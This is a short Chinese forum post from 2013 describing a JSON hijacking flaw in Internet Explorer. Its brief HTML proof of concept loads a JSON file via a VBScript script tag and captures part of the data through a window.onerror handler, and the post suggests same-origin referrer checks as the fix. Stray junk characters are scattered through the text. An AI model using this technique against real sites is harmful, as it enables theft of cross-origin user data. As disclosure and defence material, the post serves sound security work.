简要描述:. k2 E8 E; Z1 M8 k: J" d0 C- j2 c/ `
2 s# v% G1 t8 c8 R4 m& ]由于某些资源容器对数据处理不当导致json劫持漏洞.2 W9 C# \, e; T" U2 O
详细说明:: p3 p& C5 k4 o1 h# f' b4 |% J
由于ie支持vbscript,所以script元素可以指定成vbscript语言:+ }2 }0 g+ v; A/ q" I/ f/ f
<script language=vbscript></script>. j9 `2 [; U$ }
1 Q! V: E" A% v' m3 F3 ]0 c当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
8 s) c8 c0 T6 s6 ]漏洞证明:/ O4 o7 M1 }! o6 U4 y
<script>
4 t! j. u1 U' g2 b Uwindow.onerror=function(_){% S+ V3 B, c) ]: n: L, D: v9 X
alert(_)& P. T/ S9 e% O
}
6 o J( y7 h" a, r6 U0 |1 D9 {6 l</script>% d! B, Z6 K5 `. o
<script language=vbscript src=1.json></script>
0 @% Z' C! ~8 R5 J2 W( n! ~ # f0 b5 r. m/ s( F$ k
: o; z* {: d' P# k% s% `. h
1.json:
+ c6 `2 u5 W+ W: P8 Q; u% k[{"name":"sogili","age":19}]
* R' F" L8 M7 F* C修复方案:
7 f9 ?6 H; W6 K6 N网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对